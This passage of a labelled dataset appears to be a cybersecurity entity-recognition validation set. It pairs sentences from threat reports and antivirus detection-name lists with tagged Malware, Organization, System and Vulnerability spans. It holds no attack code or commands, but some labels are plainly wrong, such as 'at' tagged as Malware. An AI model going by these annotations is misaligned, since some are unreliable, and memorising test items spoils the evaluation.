Trojan/Dropper.FrauDrop.bkr Trojan.Fbphotofake.C W32/MalwareF.TPKK Trojan.ADH.2 TROJ_SPNR.04CG11 Trojan-Dropper.Win32.FrauDrop.cmn TROJ_SPNR.04CG11 TrojanDropper.FrauDrop.vm TrojanDownloader:Win32/Fraudload.H W32/MalwareF.TPKK Dropper/Win32.FrauDrop TrojanDropper.FrauDrop.bke Trojan.ADH Cryptic.BHN Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001268", "source": "cyner2_valid"}} {"text": "Drive-by downloads and multiple rooting exploits The malware uses a variety of methods to infect devices .", "spans": {}, "info": {"id": "cyner2_valid_001269", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.HPZR Trojan.Win32.Pakes W32/Trojan.DMTA-2040 Trojan.Zusy.D1FEBC Trojan:Win32/Rotker.A TScope.Malware-Cryptor.SB W32/Rootkit.J!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001270", "source": "cyner2_valid"}} {"text": "This gives users a chance to see details and better understand any changes made .", "spans": {}, "info": {"id": "cyner2_valid_001271", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Androm BKDR_ANDROM.THAOBFK Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_ANDROM.THAOBFK Backdoor.Win32.Androm.oytg Trojan.Win32.Androm.exkqhv Trojan.Win32.Z.Androm.409600 Backdoor.W32.Androm!c Trojan.PWS.Stealer.17779 BehavesLike.Win32.Packed.gt Trojan.VB.Crypt Backdoor.Androm.wjy TR/Dropper.VB.quwvl Trojan[Backdoor]/Win32.Androm Backdoor.Win32.Androm.oytg Trojan/Win32.VBKrypt.R219198 TScope.Trojan.VB Trojan.PasswordStealer Trj/GdSda.A Win32.Trojan.Inject.Auto Malicious_Behavior.SB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001272", "source": "cyner2_valid"}} {"text": "Local and Remote Shells In order to execute commands on the infected devices , as well as to provide a reverse shell to the Command & Control operators , Exodus Two immediately attempts to execute a payload it downloads with 
the name null .", "spans": {"Malware: Exodus Two": [[154, 164]]}, "info": {"id": "cyner2_valid_001273", "source": "cyner2_valid"}} {"text": "When root privilege is gained , a shell backdoor and malicious RCSAndroid agent APK file will be installed The second method is to use a stealthy backdoor app such as ANDROIDOS_HTBENEWS.A , which was designed to bypass Google Play .", "spans": {"Malware: RCSAndroid": [[63, 73]], "Malware: ANDROIDOS_HTBENEWS.A": [[167, 187]], "System: Google Play": [[219, 230]]}, "info": {"id": "cyner2_valid_001274", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Razy.D3BFAF Win32.Trojan.WisdomEyes.16070401.9500.9999 TrojWare.MSIL.Golroted.EJU BehavesLike.Win32.Trojan.jc Trojan.MSIL.Inject Win-Trojan/MSILKrypt03.Exp", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001276", "source": "cyner2_valid"}} {"text": "The vulnerability lies in a logical bug, which enables an attacker with write-only access to a share to load a malicious samba module and execute arbitrary code.", "spans": {"Vulnerability: vulnerability": [[4, 17]], "Vulnerability: logical bug,": [[28, 40]], "Vulnerability: write-only access": [[72, 89]], "Malware: malicious samba module": [[111, 133]], "Malware: execute arbitrary code.": [[138, 161]]}, "info": {"id": "cyner2_valid_001277", "source": "cyner2_valid"}} {"text": "The emails all highlighted the successful delivery of a package, which can be tracked by simply clicking on a link.", "spans": {}, "info": {"id": "cyner2_valid_001278", "source": "cyner2_valid"}} {"text": "For the past two and a half months, a WordPress plugin named Display Widgets has been used to install a backdoor on WordPress sites across the Internet.", "spans": {"Malware: WordPress plugin named Display Widgets": [[38, 76]], "Malware: backdoor": [[104, 112]]}, "info": {"id": "cyner2_valid_001280", "source": "cyner2_valid"}} {"text": "While researching the network infrastructure related to PoSeidon malware, 
Damballa was able to find information related to this campaign and its operators.", "spans": {"System: network infrastructure": [[22, 44]], "Malware: PoSeidon malware,": [[56, 73]], "Organization: Damballa": [[74, 82]]}, "info": {"id": "cyner2_valid_001281", "source": "cyner2_valid"}} {"text": "The report exposes the targets, tools, and attack techniques, and provides full details on the Lotus Blossom campaign, including all indicators of compromise.", "spans": {"Malware: tools,": [[32, 38]]}, "info": {"id": "cyner2_valid_001282", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Application.Tool.3596 Packed.Win32.PePatch!O Application.Tool.DE0C Win32.Trojan-Dropper.Binder.h W32/Trojan.EPIY-8359 Spyware.Ardakey Trojan.Win32.Hesv.coag Application.Tool.3596 Trojan.Win32.PcClient.dleljw Backdoor.W32.Rbot.lBP9 Application.Tool.3596 Program.Ardamax.772 BehavesLike.Win32.Backdoor.mm W32/TrojanX.BMPY TrojanSpy.Ardamax.sj Trojan.Win32.Hesv.coag HEUR/Fakon.mwf TrojanSpy.Ardamax TrojanSpy.Ardamax!dK0E+xHhPvU Backdoor.Win32.PcClient Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001283", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.Win32.Pincav!O Trojan.Enfal TROJ_DYER.BMC Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/MalwareF.HHES Backdoor.Trojan TROJ_DYER.BMC Win.Trojan.Enfal-50 Trojan.Win32.Pincav.ypz Trojan.Win32.Pincav.bxbuzi Trojan.Win32.Z.Pincav.57344.P Troj.W32.Pincav!c BackDoor.Tiblue.25 Trojan.Pincav.Win32.8014 W32/Risk.IONL-8174 Trojan/Pincav.eot W32/Pincav.GRW!tr Trojan/Win32.Pincav Trojan.DarkHotel.18 Trojan.Win32.Pincav.ypz Trojan:Win32/Enfal.H Trojan/Win32.Pincav.C89565 Win32.Trojan.Pincav.Alss Trojan.Pincav!xRC8VkZkT6w Win32/Trojan.c48", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001284", "source": "cyner2_valid"}} {"text": "Although malware targeting the Android OS stopped being a novelty quite some time ago, this trojan is quite 
unique.", "spans": {"Malware: malware": [[9, 16]], "System: Android OS": [[31, 41]], "Malware: trojan": [[92, 98]]}, "info": {"id": "cyner2_valid_001285", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Bot.130848 Backdoor/W32.IRCBot.46080.X Backdoor.Codbot Backdoor.Codbot.Win32.70 Backdoor.W32.Codbot.ah!c Backdoor/Codbot.ah W32/Sdbot.LGX W32.Toxbot Win32/Toxbot.AP WORM_CODBOT.BA Win.Trojan.Codbot-25 Backdoor.Bot.130848 Backdoor.Win32.Codbot.ah Backdoor.Bot.130848 Trojan.Win32.Codbot.frjs Backdoor.Win32.CodBot.47104.F Backdoor.Bot.130848 Backdoor.Bot.130848 Win32.Detox.based WORM_CODBOT.BA BehavesLike.Win32.Downloader.pc Backdoor/Codbot.k WORM/Spybot.46080.4 Trojan[Backdoor]/Win32.Codbot Backdoor.Bot.D1FF20 Backdoor.Win32.Codbot.ah Backdoor:Win32/Codbot.AM Worm/Win32.IRCBot.C217036 Backdoor.Codbot-O Backdoor.Codbot Bck/Sdbot.ELC Backdoor.Codbot.DM Backdoor.Win32.Codbot.AH W32/SpyBot.ZI!dam", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001286", "source": "cyner2_valid"}} {"text": "The end payload for this campaign is Cryptowall 3.0. 
Talos has covered this threat repeatedly and this is another example of how the success of Ransomware has pushed it to one of the top threats we are seeing today.", "spans": {"Malware: payload for": [[8, 19]], "Malware: Cryptowall 3.0.": [[37, 52]], "Organization: Talos": [[53, 58]], "Malware: threat": [[76, 82]], "Malware: Ransomware": [[144, 154]], "Malware: threats": [[187, 194]]}, "info": {"id": "cyner2_valid_001288", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.MSILPerseus.DDB45 Win32.Trojan.WisdomEyes.16070401.9500.9979", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001289", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.IRCBot.Win32.1711 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.IRCBot-2756 Backdoor.Win32.IRCBot.kzq Trojan.Win32.IRCBot.cwscme Backdoor.Win32.IRC.Bot.~RF Trojan.Mercur Backdoor/IRCBot.bmu Trojan[Backdoor]/Win32.IRCBot Win32.Hack.IRCBot.kcloud Backdoor.Win32.IRCBot.kzq Worm/Win32.IRCBot.C22556 Worm.Win32.Yoybot", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001290", "source": "cyner2_valid"}} {"text": "Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related.", "spans": {}, "info": {"id": "cyner2_valid_001291", "source": "cyner2_valid"}} {"text": "Several TXT files with commands on the attacker ’ s FTP server contain a victim identifier in the names that was probably added by the criminals : CMDS10114-Sun1.txt CMDS10134-Ju_ASUS.txt CMDS10134-Tad.txt CMDS10166-Jana.txt CMDS10187-Sun2.txt CMDS10194-SlavaAl.txt CMDS10209-Nikusha.txt Some of them sound like Russian names : Jana , SlavaAl , Nikusha .", "spans": {}, "info": {"id": "cyner2_valid_001292", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojWare.Win32.Rootkit.Hodprot.~v001 Trojan.WinSpy.985 Trojan:WinNT/Parchood.A Backdoor/Win32.Hodprot 
Backdoor.Sheedash", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001294", "source": "cyner2_valid"}} {"text": "The shell backdoor then installs the RCSAndroid agent .", "spans": {"Malware: RCSAndroid": [[37, 47]]}, "info": {"id": "cyner2_valid_001295", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Dwn.dbqfdz Trojan.DownLoader11.6274 TR/Changeling.A.2686 Dropper/Win32.FrauDrop.R112106 Trojan.Barys.DC712 MSIL/TrojanDownloader.Small.HC Win32.Trojan.Changeling.Wwoe Trojan-Dropper.MSIL.Small MSIL/Small.HC!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001296", "source": "cyner2_valid"}} {"text": "The potential actor and who they target Our current analysis strongly suggests Desert Scorpion is being deployed in targeted attacks against Middle Eastern individuals of interest specifically those in Palestine and has also been highlighted by other researchers .", "spans": {"Malware: Desert Scorpion": [[79, 94]]}, "info": {"id": "cyner2_valid_001297", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Joke.Kazna JOKE_TRAIN.A Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Joke.BKPE-2551 Joke.Train Win32/Train.A!joke JOKE_TRAIN.A Win.Joke.Kazna-1 Joke.Kazna Hoax.Win32.BadJoke.Train Joke.Kazna Riskware.Win32.Train.hpzv Joke.Kazna ApplicUnsaf.Win32.Hoax.BadJoke.Train Joke.Kazna Trojan.DownLoader9.64121 Tool.BadJoke.Win32.974 BehavesLike.Win32.Trojan.xh W32/Joke.KW not-virus:Joke.Win32.Train HackTool[Hoax]/Win32.Train Joke.Kazna Hoax.W32.Badjoke!c Hoax.Win32.BadJoke.Train Unwanted/Win32.Xema.C67955 Joke.Kazna Win32/BadJoke.AZ not-a-virus:BadJoke.Win32.Train", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001298", "source": "cyner2_valid"}} {"text": "Now , using these strings method1 can use reflection to call sendTextMessage and process the payment .", "spans": {}, "info": {"id": "cyner2_valid_001299", 
"source": "cyner2_valid"}} {"text": "A backdoor also known as: BKDR_ESCAD.SMHA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Destover BKDR_ESCAD.SMHA Backdoor.Win32.Escad.ax Trojan.Win32.Dllbot.40960.A BehavesLike.Win32.PWSYunsip.pm TR/NukeSped.ivjfp Trojan.Heur.LP.E1C304 Backdoor.Win32.Escad.ax Backdoor:Win32/Winsec.A!dha Trojan/Win32.Dllbot.R22672 Trj/GdSda.A W32/Destov.A!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001300", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanDownloader.Muskmal Trojan.Downloader Trojan.Jacard.D49FE Win32.Trojan.WisdomEyes.16070401.9500.9845 Trojan.Win32.Z.Jacard.411648 Trojan.DownLoader19.54142 BehavesLike.Win32.Virut.gh W32/Trojan.KLTK-1753 TrojanDownloader:Win32/Muskmal.A Trj/GdSda.A Win32.Trojan.Crypt.Wlzh Trojan-Downloader.Win32.Banload W32/Banload.XAK!tr Win32/Trojan.8f4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001301", "source": "cyner2_valid"}} {"text": "No parties in Libya before this analysis reported to use cyber attacks, malwares nor recruit hackers to spy on their rivals.", "spans": {"Organization: parties": [[3, 10]], "Malware: cyber attacks, malwares": [[57, 80]], "Organization: rivals.": [[117, 124]]}, "info": {"id": "cyner2_valid_001302", "source": "cyner2_valid"}} {"text": "ESET did not attribute the attacks to a particular attack group, but noted that the objective of the campaign was espionage and general information stealing.", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "cyner2_valid_001303", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.MSIL Trojan.MSILPerseus.D23447 Trojan.Win32.Spatet.exndob Trojan.DownLoader26.13037 Trojan.MSIL.ilbz TR/AD.Spatet.kaotz Trj/GdSda.A Trojan.MSIL.Crypt MSIL/Kryptik.MQL!tr Win32/Trojan.032", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001305", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Click.1210 W32/DL_small.BHK SScope.Trojan.Mezzia Win32/Trojan.73c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001307", "source": "cyner2_valid"}} {"text": "We are calling it HinataBot.", "spans": {"Organization: We": [[0, 2]], "Malware: HinataBot.": [[18, 28]]}, "info": {"id": "cyner2_valid_001308", "source": "cyner2_valid"}} {"text": "Maliciously installed bitcoin miners", "spans": {"Malware: Maliciously": [[0, 11]], "Malware: bitcoin miners": [[22, 36]]}, "info": {"id": "cyner2_valid_001309", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Golroted.A3 W32/Kolab.vky Trojan.MSIL.Krypt.11 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Stealer.ewukig Trojan.PWS.Stealer.13025 BehavesLike.Win32.Trojan.cc Trojan.MSIL6 W32/Trojan.RRXG-8151 Trojan/MSIL.elex Trojan/MSIL.Inject Trojan.MSIL.Inject Trj/CI.A Win32/AutoRun.Delf.LV Win32.Worm.Autorun.Htvy MSIL/Injector.HTG!tr Win32/Trojan.7fd", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001310", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Ranos.A Trojan.Razy.D20CA Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_RANOS.SM1 Trojan.Win32.Disfa.cwbhis TrojWare.MSIL.TrojanDownloader.Small.DS Trojan.DownLoader9.7732 BKDR_RANOS.SM1 Trojan.MSIL2 TR/Fsysna.adkt Trojan/Win32.Llac.R121751 Backdoor.Bladabindi MSIL/Small.GJ!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001311", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Frethem.I@mm Worm/W32.Frethem.35328 W32.Frethem.F Win32.Frethem.I@mm W32/Frethem.I@MM Win32.Frethem.E8D648 WORM_FRETHEM.F Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Frethem.JFVO-6973 W32.Frethem.I@mm Win32/Frethem.I WORM_FRETHEM.F Win.Exploit.IFrame-1 Win32.Frethem.I@mm Win32.Frethem.I@mm Trojan.Win32.Frethem.emoq I-Worm.Win32.NetSky.29184 W32.W.Frethem.f!c Win32.Frethem.I@mm Win32.Frethem.I@mm 
Win32.HLLM.Frethem.9 Worm.Frethem.Win32.5 BehavesLike.Win32.Dropper.nc Email-Worm.Win32.Brontok W32/Frethem.F Worm/Frethem.j WORM/Frethem.009 Worm[Email]/Win32.Frethem Worm:Win32/Frethem.H@mm Win32/Frethem.worm.35328.D W32/Frem.i@MM Worm.Frethem W32/Frethem.H Win32/Frethem.I Win32.Worm-email.Frethem.Eact I-Worm.Frethem!w9RyLJa8LZM W32/Frethem.fam@mm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001312", "source": "cyner2_valid"}} {"text": "This technique is employed by a Trojan downloader detected by Trend Micro as TROJ_POWHOV.A and P2KM_POWHOV.A, which we've uncovered in a recent spam email campaign in the EMEA region, especially organizations in the U.K., Poland, Netherlands, and Sweden.", "spans": {"Malware: a Trojan downloader": [[30, 49]], "Organization: Trend Micro": [[62, 73]], "Organization: organizations": [[195, 208]]}, "info": {"id": "cyner2_valid_001313", "source": "cyner2_valid"}} {"text": "Both the Tibetan community and the Uyghurs, a Turkic Muslim minority residing primarily in northwest China, have been targets of multiple sophisticated attacks in the past decade.", "spans": {"Organization: Tibetan community": [[9, 26]], "Organization: the Uyghurs, a Turkic Muslim minority": [[31, 68]]}, "info": {"id": "cyner2_valid_001314", "source": "cyner2_valid"}} {"text": "Emotet, a malicious group known as Moby Dick has returned to spamming operations after a months-long hiatus, and has switched to distributing malicious OneNote files.", "spans": {"Malware: Emotet,": [[0, 7]]}, "info": {"id": "cyner2_valid_001316", "source": "cyner2_valid"}} {"text": "Employees at six Russian banks were sent spoofed emails delivering Trojan.Ratopak in a narrow, targeted attack.", "spans": {"Organization: Employees": [[0, 9]], "Malware: at": [[10, 12]], "Organization: Russian banks": [[17, 30]], "Malware: Trojan.Ratopak": [[67, 81]]}, "info": {"id": "cyner2_valid_001317", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
W32.OnGamesLT180912HKGHAAI.Trojan Trojan-GameThief.Win32.OnLineGames!O Downloader.Zlob.16943 Troj.GameThief.W32.Magania.l7ZW Win32.Trojan.WisdomEyes.16070401.9500.9907 W32/ZlobP.F TROJ_ZLOB.DQC Win.Downloader.Zlob-2167 Trojan-Downloader.Win32.Zlob.bcg Trojan.Win32.Zlob.bcayco Trojan.Popuper TROJ_ZLOB.DQC BehavesLike.Win32.PWSOnlineGames.lc W32/ZlobP.F TR/Dldr.Zlob.aaz.1 Trojan-Downloader.Win32.Zlob.bcg Win-Trojan/OnlineGameHack.B Trojan-Downloader.Win32.Revelation.Zlob", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001318", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.KillAV.35840.AQ TrojanDropper.Dogkild.A4 Trojan.KillAV.Win32.1802 Troj.W32.KillAV.cpf!c Trojan/KillAV.cpf TROJ_KILLAV.ADU Trojan.KillAV TROJ_KILLAV.ADU Trojan.Win32.KillAV.vzmx Trojan.Win32.KillAV.35840.AZ TrojWare.Win32.Trojan.KillAV.~IY Trojan.AVKill.719 BehavesLike.Win32.Backdoor.nc TrojanDropper:Win32/Dogkild.C Trojan/Win32.KillAV.C646415 TScope.Malware-Cryptor.SB Win32.Trojan.Killav.Agbl Trojan.KillAV!4D1L18ztTpY Exploit.Win32.MS08067 W32/KillAV.CMO!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001319", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.DownloadSeaduke.Trojan Backdoor.Win32.Swrort!O Backdoor/Swrort.ob Python/Rozena.E BehavesLike.Win32.MultiPlug.wc Win32.Hack.Swrort.d.kcloud", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001320", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor/W32.Wisdoor.54784 Backdoor/Wisdoor.af BKDR_AOZ.A Win32.Trojan.WisdomEyes.16070401.9500.9793 W32/Wisdoor.KOGG-7396 BKDR_AOZ.A Backdoor.Win32.Wisdoor.bh Trojan.Win32.Wisdoor.elvp Win32.Backdoor.Wisdoor.Srwy Backdoor.Win32.Wisdoor.AF BackDoor.IRC.Wisdom BehavesLike.Win32.Fujacks.qc Backdoor.Win32.Wisdoor W32/Wisdoor.AY@bd Backdoor/Wisdoor.dz Trojan[Backdoor]/Win32.Wisdoor Backdoor:Win32/Wisdoor.CK Backdoor.W32.Wisdoor.af!c Backdoor.Win32.Wisdoor.bh 
Trojan/Win32.Wisdoor.R93697 Backdoor.Win32.Wisdoor.a Bck/Wisdoor.I Win32/Wisdoor.AF Backdoor.Wisdoor!KUkBN9ZhT8k", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001321", "source": "cyner2_valid"}} {"text": "They provide users and administrators with the convenience of being able to take full control of their systems without needing to be physically in front of a device.", "spans": {"System: systems": [[103, 110]], "System: device.": [[158, 165]]}, "info": {"id": "cyner2_valid_001322", "source": "cyner2_valid"}} {"text": "Since early 2015, FireEye Threat Intelligence has observed the significant growth of point-of-sale POS malware families in underground cyber crime forums.", "spans": {"Organization: FireEye Threat Intelligence": [[18, 45]], "Malware: point-of-sale POS malware families": [[85, 119]]}, "info": {"id": "cyner2_valid_001323", "source": "cyner2_valid"}} {"text": "We have previously written about related activity in which a particular China-based attack group used PlugX and NetTraveler Trojans for espionage in Europe, Russia, Mongolia, Belarus, and other neighboring countries.", "spans": {"Malware: PlugX": [[102, 107]], "Malware: NetTraveler Trojans": [[112, 131]]}, "info": {"id": "cyner2_valid_001324", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TROJ_PFINET.A Win32.Trojan.WisdomEyes.16070401.9500.9996 W64/Pfinet.A Backdoor.Pfinet Win32/Pfinet.A TROJ_PFINET.A W64/Pfinet.NCKD-3924 Backdoor:WinNT/Pfinet.B!dha Malware_fam.B Win32/Trojan.640", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001325", "source": "cyner2_valid"}} {"text": "Despite Beijing's unwillingness to participate in the international arbitration and their rejection of the PCA's jurisdiction, there appears to be a distinct effort to surreptitiously target those who are interested in this landmark international legal case via electronic means.", "spans": {}, "info": {"id": "cyner2_valid_001326", "source": "cyner2_valid"}} 
{"text": "The compromised devices are used to steal unencrypted network traffic and offer proxying services to the botnet operator.", "spans": {"Vulnerability: compromised devices": [[4, 23]]}, "info": {"id": "cyner2_valid_001327", "source": "cyner2_valid"}} {"text": "The Android platform continues to be particularly susceptible, with one specific malware family called DressCode steadily and stealthily spreading since April before reports about it surfaced in August.", "spans": {"System: Android platform": [[4, 20]], "Malware: malware family": [[81, 95]], "Malware: DressCode": [[103, 112]]}, "info": {"id": "cyner2_valid_001329", "source": "cyner2_valid"}} {"text": "We begin by reading news of an attack against the Taiwanese Government.", "spans": {"Organization: the Taiwanese Government.": [[46, 71]]}, "info": {"id": "cyner2_valid_001330", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9954 Trojan.Win32.Etchfro.czmvwf Trojan.Etchfro.3 Trojan:Win32/Etchfro.C Trojan.Win32.KillAV Win32/Trojan.Adware.37e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001331", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_BLADABI.SMC Hacktool.Msil.Flooder!c Backdoor.MSIL.Reomot.TG BKDR_BLADABI.SMC Trojan.MSIL.Spy W32/Trojan.XXTE-4287 BDS/Remote.kdia PWS:MSIL/Mintluks.A Trj/GdSda.A Msil.Hacktool.Flooder.Htwp MSIL/SpyPSW.AVQ!tr Win32/Trojan.Flooder.211", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001332", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.Autorun.j Worm.Win32.AutoRun W32/AutoRun.bbud Trojan.Buzy.440 Trojan.Win32.AutoRun.bpdmo Trojan.Minit Win32/AutoRun.ADR WORM_OTORUN.SML Worm.Autorun-1854 Worm.AutoRun!QjR+q9a4/Kw Worm.Win32.Autorun.192000.C[h] Worm:W32/Autorun.OY Worm.AutoRun.Win32.81931 WORM_OTORUN.SML W32/Autorun.worm.gr Worm/AutoRun.qcf 
WORM/Autorun.giqh Worm/Win32.AutoRun Worm.Autorun.kcloud Worm/Win32.AutoRun W32/Autorun.worm.gr Worm.Win32.AutoRun Worm.Win32.AutoRun W32/AutoRun.BDJ!tr W32/Autorun.KOF.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001333", "source": "cyner2_valid"}} {"text": "Figure 26 : the kill switch code snippet Evidence implies that the “ Agent Smith ” actor is currently laying the groundwork , increasing its Google Play penetration rate and waiting for the right timing to kick off attacks .", "spans": {"Malware: Agent Smith": [[69, 80]], "System: Google Play": [[141, 152]]}, "info": {"id": "cyner2_valid_001334", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Scar Troj.W32.StartPage.lMKH Win32.Trojan.WisdomEyes.16070401.9500.9705 W32/Trojan.MRND-5328 Win32/CDoor.AD WORM_SCAR.DRDL Win32.Trojan.Scar.C Trojan.Win32.Scar.drdl Trojan.Win32.Scar.dctpie Trojan.Win32.Z.Scar.368640.I Trojan.MulDrop7.61859 Trojan.Scar.Win32.47893 WORM_SCAR.DRDL BehavesLike.Win32.BadFile.ft Worm.Win32.Yimper W32/Trojan2.NOIP Trojan/Scar.ajmz WORM/Yimper.rqfxr Trojan.Win32.Scar.drdl Trojan.Scar W32/Ircbot.DAC.worm I-Worm.Yimper.A Win32/Yimper.A Win32.Trojan.Scar.Ecuc Trojan.Scar!sMBz7qtKkGU W32/Scar.DRDL!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001335", "source": "cyner2_valid"}} {"text": "At least five different attacks were attributed to ITG03 actors, including a significant incident at the crypto exchange, Coincheck.", "spans": {"Organization: the crypto exchange, Coincheck.": [[101, 132]]}, "info": {"id": "cyner2_valid_001337", "source": "cyner2_valid"}} {"text": "A backdoor also known as: I-Worm.Golember.r6 Worm.Golember.Win32.35 Trojan/Golember.g Win32.HLLW.Rosya.D W32/Golember.G Win32/Rosya.D WORM_GOLEMBER.G IRC-Worm.Win32.Golember.g Trojan.Win32.Golember.emqh W32.W.Golember.g!c Worm.Win32.Rosya.D Win32.HLLW.Rosya.6 WORM_GOLEMBER.G BehavesLike.Win32.Dropper.pc W32/Golember.CCCT-0854 Worm/Sramota.agk 
W32/Golember.G Worm[IRC]/Win32.Golember Trojan.Heur.PT.cyWbbO2nkQh Trojan/Win32.OnlineGameHack Worm:Win32/Rosya.D Win32/Rosya.E IRC-Worm.Win32.Golember.g Worm/Rosya.F Worm.Win32.Golember.g", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001338", "source": "cyner2_valid"}} {"text": "As Lookout first reported more than eight months ago , the problem with Shedun/HummingBad and similar malicious app families that silently exploit Android rooting vulnerabilities is that the infections can survive normal factory resets .", "spans": {"Organization: Lookout": [[3, 10]], "Malware: Shedun/HummingBad": [[72, 89]], "Vulnerability: Android rooting vulnerabilities": [[147, 178]]}, "info": {"id": "cyner2_valid_001340", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.ICKiller.A Trojan.Win32!O Trojan.ICKiller.A Win.Trojan.ICKiller-1 Trojan.ICKiller.A Trojan.Win32.ICKiller Trojan.ICKiller.A Trojan.Win32.ICKiller.bpcqy TrojWare.Win32.ICKiller._0 Trojan.ICKiller.A Trojan.ICKiller Trojan.ICKiller.Win32.1 W32/Trojan.YCCC-3040 Trojan/Win32.ICKiller Trojan.ICKiller.A Trojan.Win32.ICKiller Trojan.ICKiller.A Trj/CI.A Win32/Trojan.322", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001342", "source": "cyner2_valid"}} {"text": "In this case, there is no malicious code in the attachment itself.", "spans": {"Malware: malicious code": [[26, 40]]}, "info": {"id": "cyner2_valid_001343", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.DownLoad3.45983 HackTool:Win32/Uflooder.B!bit Backdoor/Win32.PcClient.R3680", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001344", "source": "cyner2_valid"}} {"text": "Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand.", "spans": {"Malware: Bookworm": [[29, 37]], "Malware: payload": [[43, 50]]}, "info": {"id": "cyner2_valid_001346", "source": "cyner2_valid"}} {"text": 
